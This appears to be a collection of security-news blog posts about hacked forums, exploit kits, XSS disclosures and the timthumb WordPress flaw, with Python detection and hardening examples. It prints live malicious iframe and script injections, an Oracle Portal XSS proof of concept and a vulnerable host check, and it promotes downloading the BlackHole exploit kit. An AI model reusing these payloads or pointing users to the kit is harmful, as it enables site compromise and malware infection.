
TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit

A serious security breach has compromised the official TeamSpeak forum. According to sources, the attackers gained access to the server and injected a malicious script into the forum's landing page. Malware analysts found that the attack was carefully planned to infect as many users as possible by silently redirecting them to a DotCache exploit kit landing page, as illustrated in the screenshot below.
TeamSpeak Systems is a German company offering VoIP software that lets computer users talk in a chat channel with other users, much like a telephone conference call. Users run the TeamSpeak client to connect to a TeamSpeak server of their choice, join its chat channels and talk; the software is used by millions of gamers worldwide.
That makes TeamSpeak a high-value target, and the attackers treated it as one. Researchers said the exploit kit landing page was hosted on atvisti.ro, a forum for ATV enthusiasts that had also been compromised. Malware analyst and security researcher Jerome Segura said that if the Java exploit succeeds, the final payload is loaded; in this case the payload was the ZeroAccess trojan, which Malwarebytes Anti-Malware detects as Rootkit.0Access. The small consolation is that this sample had not previously been seen in the wild: according to VirusTotal, only 7 of 46 antivirus engines detected it at the time. A few days earlier, Kahu Security had uncovered a similar compromise on the forum of the Nissan Pathfinder Off Road Association (NPORA); in both cases JJEncode was used to obfuscate the injected script. The TeamSpeak forum administrators were informed and, as expected, have since cleaned up the injection. For a detailed analysis of the malware, see the official Malwarebytes blog post.




Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700


Anyone who frequents underground hacker communities knows that illicit goods such as botnets, zero-day exploits, the Blackhole exploit kit, malware and undisclosed vulnerabilities are sold there at a range of prices. Most such products sell for $5 to $500, but today I will talk about a more expensive item that has made it to the top of the black market listings: a new cross-site scripting exploit that enables attackers to steal cookies and access Yahoo! Mail accounts. According to Krebs on Security, a zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious Web sites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a "cross-site scripting" (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users. Such a flaw would let attackers send or read email from the victim's account. In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. Such scripts can even rewrite the content of the HTML page. The seller posted a video demonstrating the exploit to potential buyers.


“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers,” wrote the vendor of this exploit, using the hacker handle ‘TheHell.’ “And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!”
In response, Ramses Martinez, director of security at Yahoo!, said the challenge now is working out the exact yahoo.com URL that triggers the exploit, which is difficult to discern from the video. “Fixing it is easy, most XSS are corrected by simple code change,” Martinez said. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”






Two Young Researchers Found Vulnerability in Microsoft Windows Live Which Could Lead ID-Theft

Recently two young security researchers from Morocco, Abdeljalil S'hit and Yasser Aboukir, discovered a serious vulnerability in Microsoft's Windows Live service. The vulnerability was reported to Microsoft, but at first the software giant neither offered compensation nor commented on the issue. According to ZDNet, the vulnerability leveraged cross-site scripting (XSS) to execute a malicious script.

More specifically, the two researchers managed to trigger an error on the Windows Live login page (shown above), and once the victim clicked the "Continue" button, their malicious script would execute. An XSS flaw of this kind means an attacker could impersonate a Windows Live user by taking full control of the victim's cookies. Combined with social engineering, this technique could be used to steal a victim's Windows Live identity with ease.

The last update we got from Microsoft is saying - "We quickly addressed the vulnerability in question to help keep customers protected and appreciate the researchers using Coordinated Vulnerability Disclosure to assist in us working toward a fix in a coordinated manner"







Hacked Sites Infecting Android Mobiles With "drive-by" Malware


Analysts with Lookout Mobile Security have found websites that were hacked to deliver malicious software to devices running Android, an apparently new attack vector crafted for the mobile operating system. The style of attack, known as a drive-by download, is common on the desktop: when someone visits a hacked website, malware can transparently infect the computer if it lacks up-to-date patches. The malware, dubbed NotCompatible by Lookout and initially reported by Reddit user Georgiabiker, is loaded through an iframe at the bottom of a manipulated web page. When a user arrives on the page, a file named "Update.apk" begins downloading immediately. From the Lookout Mobile Security blog post:
How it Works :- 
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application; this process is commonly referred to as a drive-by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details :- 
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will see a blank page). When visiting this page from an Android browser, the server returns an Android application, causing the browser to automatically download it. For detailed information see Lookout's full write-up.





Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected

More than 200,000 web pages, on almost 30,000 unique sites, have been compromised by this fake anti-virus injection. According to the computer security group Websense, the injection, which mostly affects sites built with WordPress, places a short piece of code at the bottom of each page:
</DIV><!--END body=wrapper -->
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
</BODY>
</HTML>

When a user loads the page, they are redirected to a page under the rr.nu domain that mimics a Windows security scan and then asks them to download a malicious program that supposedly cleans viruses from their computer. It is a scam that has run in various forms for years, and Websense says it has been tracking this particular threat for several months.
Although the source of the malware is unknown, over 85% of the affected sites are in the United States, and Sucuri Security has traced many of the cases to outdated WordPress installs, weak passwords, or vulnerable and malicious plugins. According to several reports the campaign is not as widespread as something like DNSChanger; still, for anyone who runs WordPress, it is something to watch out for.
Earlier, in 2011, we saw similar scenarios when 614,000 web pages were compromised in a mass ASP.NET infection, the Willysy malware infected more than 6 million websites, the Lilupophilupop attack hit more than 1 million web pages, and so on.
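Both injections above (the hidden NotCompatible iframe and the fake-AV script tag appended to each page) share a shape that can be checked for mechanically: an iframe that is hidden or points off-site, a script loaded from a host the site never used before, or a relay page whose only content is a top-window redirect. The following is an added example, not code from Lookout, Websense or this page, written in Python, that scans a page for those patterns. The sample pages are constructed to mimic the quoted snippets, with made-up .invalid hostnames in place of the real campaign domains, and the allow-list of legitimate third-party script hosts is an assumption the site operator has to supply.

```python
"""Scan HTML for the injection patterns seen in the NotCompatible and
fake-AV campaigns: hidden/off-site iframes, off-site script tags and
redirect-only inline scripts. Added example; not from Lookout or Websense."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# An inline script whose entire body is "window.[top.]location[.href] = '...';"
REDIRECT_ONLY = re.compile(
    r"^\s*window\.(?:top\.)?location(?:\.href)?\s*=\s*['\"][^'\"]+['\"]\s*;?\s*$")


def _same_site(host, page_host):
    """True when host is page_host itself or one of its subdomains."""
    host, page_host = host.lower(), page_host.lower()
    return host == page_host or host.endswith("." + page_host)


def _is_hidden(attrs):
    """Hidden via CSS (display:none / visibility:hidden) or sized 0x0 / 1x1."""
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    tiny = ("0", "1")
    return attrs.get("width", "").strip() in tiny and attrs.get("height", "").strip() in tiny


class _Collector(HTMLParser):
    """Collects every <iframe> and <script> with its attributes and inline text."""

    def __init__(self):
        super().__init__()
        self.tags = []        # (tag, attrs, inline_text)
        self._script = None   # [attrs, [text chunks]] while inside <script>

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.tags.append(("iframe", attrs, ""))
        elif tag == "script":
            self._script = [attrs, []]

    def handle_data(self, data):
        if self._script is not None:
            self._script[1].append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            attrs, chunks = self._script
            self.tags.append(("script", attrs, "".join(chunks)))
            self._script = None


def find_injections(html, page_host, allow_hosts=()):
    """Return [(kind, detail), ...] for one page.

    page_host is the host the page was fetched from; allow_hosts lists the
    third-party script hosts the site legitimately uses (an operator-supplied
    assumption, e.g. its CDN)."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    findings = []
    for tag, attrs, inline in parser.tags:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""   # "" for relative URLs
        offsite = bool(host) and not _same_site(host, page_host) \
            and not any(_same_site(host, a) for a in allow_hosts)
        if tag == "iframe":
            if _is_hidden(attrs):
                findings.append(("hidden-iframe", src))
            elif offsite:
                findings.append(("offsite-iframe", src))
        elif offsite:
            findings.append(("offsite-script", src))
        elif not src and REDIRECT_ONLY.match(inline):
            findings.append(("redirect-only-script", inline.strip()))
    return findings


# Constructed samples mimicking the snippets quoted above; hostnames are
# made-up .invalid names, not the real campaign domains.
NOTCOMPATIBLE_PAGE = """<html><body><p>forum post</p>
<iframe style="visibility: hidden; display: none; display: none;"
src="http://gaoanalitics.invalid/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
</body></html>"""
RELAY_PAGE = """<html><head></head><body><script type="text/javascript">
window.top.location.href = "http://androidonlinefix.invalid/fix1.php";</script></body></html>"""
FAKEAV_PAGE = """<html><body><div id="wrapper">post</div><!--END body=wrapper -->
<script src="http://ionis901andsi.rr.invalid/mm.php?d=1"></script>
</BODY>
</HTML>"""
CLEAN_PAGE = """<html><body><script src="/js/app.js"></script>
<script src="https://cdn.example.net/jquery.js"></script>
<iframe src="https://static.example.org/embed"></iframe></body></html>"""

if __name__ == "__main__":
    for name, page, host in [("notcompatible", NOTCOMPATIBLE_PAGE, "forum.example.org"),
                             ("relay", RELAY_PAGE, "gaoanalitics.invalid"),
                             ("fakeav", FAKEAV_PAGE, "blog.example.com"),
                             ("clean", CLEAN_PAGE, "example.org")]:
        print(name, find_injections(page, host, allow_hosts=("cdn.example.net",)))
```

Run the module directly to print the findings for each sample. The off-site-script rule is the noisiest of the three in practice, because most sites load scripts from CDNs, so the allow-list should be built from a known-clean copy of the site rather than guessed; the hidden-iframe and redirect-only rules rarely fire on legitimate pages.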


-Source (The Verge)





Serious Vulnerabilities Found By Deepanker Verma on Online Shopping Website


 

Vulnerable Website:-
http://shopping.indiatimes.com/

According To the Hacker:-


"IndiaTimes shopping website has some serious XSS vulnerabilities which can lead to cookie stealing of users. And this may cause some serious loss to users. After going through some pages of the website, we (Shadab and me ) have found that the website is vulnerable to XSS injections and malicious scripts can be injected on the website."

Screenshots submitted by the researcher to prove the vulnerabilities (not reproduced here) show:

  • XSS on the login page
  • JavaScript injection
  • a vulnerability on the product page
  • cookie stealing
  • iframe injection

The screenshots show that the site is genuinely vulnerable, with several injection points that a black hat could use to inject malicious code and do real harm to users.


Image-Based Zero-day Vulnerability in WordPress


Bilocating technology blogger Mark Maunder - he claims to live in Seattle and Cape Town concurrently, though I suspect he means consecutively, and I'll wager he wisely avoids winter in both of them - recently wrote about an intrusion to his WordPress site.
It turns out the backdoor was a previously-unexploited, or at least a previously-undocumented, flaw in a useful little WordPress addon, shared by many WordPress themes, called timthumb.
Timthumb is an 864-line PHP script which assists with automatic image resizing, thumbnailing and so forth. (It doesn't squeeze the image manipulation code into those 864 lines, but uses the third-party GD library.)
If you run WordPress and you have a file named timthumb.php, sometimes renamed to thumb.php, in your installation, you may be at risk.
Tracking down the mechanism behind his intrusion, Maunder identified three main problems with timthumb.php: poor default settings; poor verification of input data; and poor choice of file permissions for temporary files.
By default, the vulnerable version of timthumb allowed images from external sites to be accessed from your server. The default list is probably unsurprising: 

// external domains that are allowed to be displayed on your website
$allowedSites = array (
    'flickr.com',
    'picasa.com',
    'img.youtube.com',
    'upload.wikimedia.org',
);

But a better default would be an empty list, so that users who want to allow external files to be sourced by their own servers need to take steps to enable that capability.
If you use WordPress and timthumb and you don't need this capability, Maunder suggests simply editing the timthumb.php code to say $allowedSites = array(); in order to prevent remote file trickery.
Secondly, timthumb.php checked the sanity of remote URLs - to verify they really were in the list of allowed sites - by looking for the permitted domains somewhere in the hostname part of the URL, rather than making sure they were the hostname part:

$isAllowedSite = false;
foreach ($allowedSites as $site) {
        if (strpos (strtolower ($url_info['host']), $site) !== false) {
                $isAllowedSite = true;
        }
}
This code meant that a dodgy website name such as picasa.com.badsite.example would pass the test, simply because it contains the string picasa.com. Clearly, that is not what was intended.
Lastly, timthumb.php stored the files it generated in a cache directory inside the web-served PHP directory tree. This is bad, because files generated from untrusted external content - files only ever intended to be displayed - needlessly became executable.
So if the cached file isn't an innocent image but a remote-access PHP Trojan (in Maunder's case, the attacker used a malicious remote console tool called Alucar), you're owned.


If you are a web developer:

* Don't trust externally-sourced content by default. Force your users to think about what they really want.
* Check, test, check, test, check and test again your URL sanitisation code. Build a decent test suite and verify your code against it every time you release an update.
* Keep files which are only ever supposed to be used as data - especially remotely-sourced files - outside the directory tree where your server-side executable code lives.

If you run a WordPress installation:-

Check if any of the blogs you host use timthumb.php, and upgrade to the latest version. The dodgy strpos above has been replaced with a tighter match based on a regular expression, like this:

$isAllowedSite = false;
foreach ($allowedSites as $site) {
    if (preg_match ('/(?:^|\.)' . $site . '$/i', $url_info['host'])) {
        $isAllowedSite = true;
    }
}
This doesn't fix all of the issues Maunder describes, but it's better than having a known hole in your site.
Many thanks to Mr Maunder for turning an attack on his site into a training tool to help the rest of us avoid a similar problem!
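The substring check and its regex replacement are easy to get wrong in either direction, so here is an added example (not timthumb's own code; the PHP logic is ported to Python so the two checks can be run side by side) that pits the original strpos() test against a stricter host match, and sketches the third fix Maunder describes, caching fetched files outside the executable tree. The cache directory path is an assumption. re.escape() is also an addition: the page's regex interpolates the site name without escaping, so the '.' in img.youtube.com would match any character and imgXyoutube.com would pass.

```python
"""timthumb's allowed-site check, vulnerable vs hardened (Python port, added
example; not the plugin's own code)."""
import hashlib
import os
import re
from urllib.parse import urlparse

# The plugin's default list, as quoted above.
ALLOWED_SITES = ["flickr.com", "picasa.com", "img.youtube.com", "upload.wikimedia.org"]

# Assumption: a directory outside the document root that the web server
# never serves and never runs PHP from.
CACHE_DIR = "/var/cache/timthumb"


def is_allowed_vulnerable(url, allowed=ALLOWED_SITES):
    """The original strpos() logic: allowed if the host merely *contains*
    an entry, so picasa.com.badsite.example and notflickr.com both pass."""
    host = (urlparse(url).hostname or "").lower()
    return any(site in host for site in allowed)


def is_allowed_fixed(url, allowed=ALLOWED_SITES):
    """Allowed only if the host *is* an entry or a subdomain of it, and the
    scheme is http(s). re.escape() keeps the '.' in each entry literal, which
    the page's PHP pattern does not do."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https") or not host:
        return False
    return any(re.search(r"(?:^|\.)" + re.escape(site) + r"$", host) for site in allowed)


def cache_path(url):
    """Where a fetched file would be stored: a hash-derived name with a fixed
    non-script extension, under CACHE_DIR, so the remote side controls neither
    the file name nor its extension and the file can never be requested as PHP."""
    digest = hashlib.sha256(url.encode("utf-8")).hexdigest()
    return os.path.join(CACHE_DIR, digest + ".img")


if __name__ == "__main__":
    for url in ("http://farm1.static.flickr.com/1/2.jpg",
                "http://picasa.com.badsite.example/shell.php",
                "http://notflickr.com/x.png",
                "http://imgxyoutube.com/a.jpg"):
        print(url, is_allowed_vulnerable(url), is_allowed_fixed(url), cache_path(url))
```

Running the module prints, for each constructed URL, the verdict of both checks: the first is accepted by both, the next two only by the vulnerable check, and the last by neither. Whatever check you settle on, the cache location matters just as much: a correct allow-list still leaves you exposed if a compromised allowed site hands you a PHP file that lands somewhere the server will execute it.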

-News Source (NS)


PCA start a new project named "You are Stupid" & this time the victim is NIC India


Pakistan Cyber Army (PCA) has launched a project called "You are Stupid". After the Acer disclosure, another disclosure has followed, this time aimed at India's National Informatics Centre (NIC). Here too they used the same method, "Google hacking". Their stated intention in bringing out the information was to prove the old saying "There is no patch for human stupidity". With this disclosure PCA wants to show that in today's complex security and network architectures many common things can be overlooked: the push is towards buying high-value solutions rather than developing awareness of the most important factor, the human resource. Here are some photos that tell the story.


 

PCA said:- "... We were very sad and disappointed to see that such criminal negligence has been done and carried on for 3 years. We don't know whether we are the ones who got this information or plenty of hackers have already used that information for malicious purposes. We only used "Google hacking" to pull out the information. Many script kiddies out there were joking, even taking us so lightly that it wasn't a hack or even a kid can do this stuff with the information. We only answer: "Where the F*** was everybody else since this information was there for 3 years?" Grow up, hacking is not the usage of 0day exploits or usage of "Metasploit" and so to speak "Havij", it's in the mind and in the intentions and even in life. In our opinion hacking is nothing but "Thinking! out of the box"..."

PCA also exposed the full credentials (admin ID and password, vulnerable link).
For security reasons I can't publish those credentials on my site.


BlackHole Exploit Kit 1.0.2 is now Available


The BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September 2010 and has since quickly gained market share over its many competitors; many antivirus vendors now say it is one of the most prevalent exploit kits in the wild, and Malware Domain List shows quite a few domains serving it. One of its notable features is the TDS, or Traffic Direction Script. While this is not an entirely new concept in attack toolkits, the TDS included here is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that redirects traffic according to a set of rules. For example, a user can set up rules that send visitors to different landing pages on their domain based on operating system, browser, country of origin, exploit, files, and so on. One rule might redirect all users running Windows XP through Vista with IE 8 to page A, while another redirects Windows 7 users to page B. Those are just simple example rules.
More advanced rules can set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole goes a step further: it lets the operator build traffic flows from these rules and provides a management interface for the flows. A savvy malicious user with experience could easily use this rule engine to increase their infection numbers. From a web application standpoint BlackHole is built like other kits, with a PHP and MySQL backend; since the majority of web servers run on the LAMP stack, this makes deployment very easy. The user interface is a cut above the rest, and it looks nicer than almost any other attack kit.
Download BlackHole Exploit Kit 1.0.2 here


Now anyone can be a cyber criminal



Cyber crime is no longer the exclusive domain of nerds with advanced coding and hacking skills. Thanks to simple and affordable, DIY downloadable crimeware, even novices can jump into what has turned into a global industry.
This is a far cry from the days when hacks were motivated more by the thrill of the kill than monetary gain, with even Steve Jobs and Steve Wozniak (Apple’s co-founders) allegedly among their ranks. It’s in the last decade, with the widening reach of the internet, that cyber crime turned virulent, as viruses like Melissa and I Love You clogged inboxes and spawned a multi-billion-dollar anti-virus software industry. And now, with the DIY attack kits, cybercrime is evolving into an extremely profitable, distributed global entity.
These malware toolkits aren’t just professional, marketable, and easy to deploy, they’re even being sold on a subscription model with after sales support.
Mpack, Neosploit, ZeuS, Nukesploit P4ck, Phoenix … there’s an array of choices for script kiddies (those with minimal coding skills). “These kits come with features like encryption and hardware-based licensing, which one would find in enterprise-grade software,” says cyber sleuth Prasanna V, principal consultant of information security with Packet Verify. They enable users to launch pre-written threats against computer systems, and also customise them.
The United States, Russia, China, the UK, Germany, Brazil and Eastern European countries like Ukraine are considered the hotbeds for development of such kits, and the damage they’re causing is already evident. According to a report by Symantec Corp, there was a 93% increase in web-based attacks in 2010 compared to the previous year, driven primarily by the prevalence of attack toolkits.
The modus operandi:
Most of the toolkits share a few common behavioural patterns, say Dr Madhupani and Dr Srinivas, technology experts with Cyber Security Works. “These can include capabilities to penetrate into browser processes, take screenshots of the victim’s machine or control it remotely, hijack e-banking sessions, add pages to a website and monitor them or steal passwords that have been stored by popular programs/browsers.” Users are lured through phishing websites, spam emails, download websites, freeware, or malicious codes inserted in legitimate programs.
What’s more worrying is that malware attacks from toolkits are difficult to monitor and curb because of both technological and legal factors. The cyber laws in most countries are largely inadequate to deal with the scale and reach of the crime. For example, a tool kit can enable a cyber criminal in Nigeria to spoof an Indian bank to send phishing emails to trick users in India. The network of cyber crime is spread so wide that it demands a coordinated effort by law enforcement agencies from all over the world that, as of now, is nonexistent.
On the technical side, “toolkits enable hackers to continuously generate new mutated malware variants, each targeting a different victim, making traditional discovery and fingerprinting of these threats nearly impossible,” says Ajay Goel, managing director, Symantec for India and SAARC.
On your guard:
So what can you do to protect yourself? For starters, realise that security does not start and end with an antivirus kit or a firewall, says Prasanna. “Do not perform any financial transactions from shared systems like cyber cafes. Avoid connecting to free Wi-Fi hotspots. Scan USB before using. Stay away from suspicious websites and emails, limit the amount of personal information you give out on social networking sites like Facebook or Orkut,” he warns. “Finally, set the ‘automatic update’ option ON in all applications.”
Cyber Security Works issues another guideline: “Treat information the way you would treat your money.”


Attackers target applications


Software applications rather than operating systems or web browsers were the favoured target of cyber attackers last year, although the total number of application vulnerabilities was significantly down compared to 2009, a new report from Microsoft has shown.
Microsoft’s latest Security Intelligence Report found that overall, the industry’s disclosure of vulnerabilities – holes in software that bad guys can exploit – has been declining since 2006. Microsoft attributed this to better development practices and quality control on the part of developers, which it said results in more secure software.
Attacks exploiting weaknesses in Java rose sharply during the third quarter of 2010, beating every other kind of exploitation tracked by Microsoft’s Malware Protection Centre. Exploits using HTML and JavaScript increased steadily throughout the year and continue to represent a large portion of exploits, the report said.
In the third quarter, the number of Java attacks increased to fourteen times the number recorded in the previous quarter, following the discovery of two vulnerabilities in the Java Virtual Machine. These flaws alone accounted for 85% of the Java exploits detected in the second half of 2010. By the end of the year Java exploits far outnumbered all other types of exploit, including HTML/script, operating system, document reader and even Adobe Flash exploits.

Drop-offs in flow of spam

The flow of spam also saw two massive drop-offs during last year, in September and December, which Microsoft said was due to the elimination of two sources – the Cutwail Spambot and Rustock. While Cutwail was taken out as part of an operation by security researchers, Rustock re-emerged in January and has begun sending spam again.
Now in its tenth year, Microsoft’s Security Intelligence Report provides in-depth perspectives on software vulnerabilities, exploits, malicious and potentially unwanted software and security breaches in both Microsoft and third party software.
The full report can be downloaded here.  


SWFRETools: A Tool to Reverse Engineer SWF Files


The SWFRE Tools are a collection of tools built for vulnerability analysis of the Adobe Flash player and for malware analysis of malicious SWF files. The tools are partly written in Java and partly in Python and are licensed under the GPL 2.0 license.
The basic architecture of SWFRETools is as follows:
  • Flash Dissector: Flash Dissector is a GUI tool that allows you to inspect SWF files on a binary level. When you open a SWF file in Flash Dissector you have the ability to look through the structures defined in the SWF file in a hex editor and in a structure viewer. This makes it easy to understand what bytes of a SWF file hold what functionality.
  • SWF Parser: SWF Parser is an open-source SWF file parser implemented in Java that you can build upon when you want to create your own Flash reverse engineering tools.
  • Minimizer: The Minimizer program takes a SWF input that makes Flash Player crash and automatically removes the parts of the SWF file that are not related to the crash. This makes it easier to determine what the root cause of a crash is.
  • FP Debugger: This Flash Player hooking script hooks important functionality in Flash Player at runtime and dumps information about what Flash Player is parsing and executing. This is very useful in situations where Flash Player trips up and static analysis is out of sync with what Flash Player is doing.
  • StatsGenerator: Generate stats over SWF files.
Detailed information about using the above tools can be found in the “readme” files in each of their directories. Application testing and code review businesses are booming in the IT and financial sectors, and tools such as SWFREtools help when you analyse SWF-based exploits or even extract metadata from embedded images.
This SWF file reverse engineering framework depends on the following lists of files and softwares:
  • Java FileDrop
  • JHexView
  • Java
  • splib
  • Buggery
Download SWFREtools (swfretools_100.zip) here


XSS in Oracle AS Portal 10g


I. VULNERABILITY
-------------------------
XSS in Oracle Portal Database Access Descriptor

II. BACKGROUND
-------------------------
Oracle AS Portal is a Web-based application for building and deploying
portals. It provides a secure, manageable environment for accessing
and interacting with enterprise software services and information
resources.

III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in Oracle Application
Server that allows arbitrary HTML/script code to be executed in the
context of the victim user's browser.

The code injection is done through the DAD name. A DAD (Database
Access Descriptor) is a set of values that specifies how a database
server should fulfill a HTTP request.

IV. PROOF OF CONCEPT
-------------------------
Original request:
http://<oracle-application-server>/portal/pls/<DAD>

Malicious request:
http://<oracle-application-server>/portal/pls/<XSS injection>

Example 1:
http://<oracle-application-server>/portal/pls/"<H1>XSS vulnerability<XSS

In this scenario the attacker has the difficulty of being unable to
close the HTML tag, because the character "/" cannot be included in the
injection (the DAD name). However, it is possible to generate that
character without it appearing in the injection, as the example below
shows (the String.fromCharCode() sequence decodes to
<HTML><H1>XSS</H1> <H2>VULN</H2>, which replaces the page body).

Example 2:
http://<oracle-application-server>/portal/pls/"<img src=""
onmouseover="document.body.innerHTML=String.fromCharCode(60,72,84,77,76,62,60,72,49,62,88,83,83,60,47,72,49,62,32,60,72,50,62,86,85,76,78,60,47,72,50,62);"><XSS

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can leverage to steal sensitive information as
user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Tested in Oracle Application Server Portal (Oracle AS Portal) 10g,
version 10.1.2. Other versions may be affected too.

VII. SOLUTION
-------------------------
Install the latest CPU (Critical Patch Update).

VIII. REFERENCES
-------------------------
http://www.oracle.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
August  11, 2010: Initial release
May     01, 2011: Final revision

XI. DISCLOSURE TIMELINE
-------------------------
August  11, 2010: Discovered by Internet Security Auditors
August  11, 2010: Oracle contacted including PoC.
August  12, 2010: Oracle inform that will investigate
                  the vulnerability.
April   19, 2011: Oracle fixed the vulnerability in the
                  CPU (Critical Patch Update).
May     01, 2011: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.


Mass Injections Leading to g01pack Exploit Kit

Our ThreatSeeker® Network is constantly on the lookout to protect our customers from malicious attacks.  Recently it has detected a new injection attack which leads to an obscure Web attack kit.  The injection has three phases which will be covered in this blog post. Websense customers are protected from this attack by ACE, our Advanced Classification Engine.

The first phase of the attack is a typical vector for exploit kits to drive traffic to their sites: script injections.  Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge.  In this case, legitimate sites are injected with malicious JavaScript.
 
In the second phase, this script injection then pulls obfuscated content from another site. The obfuscated content creates an iframe that is used to pull content from the exploit kit site.
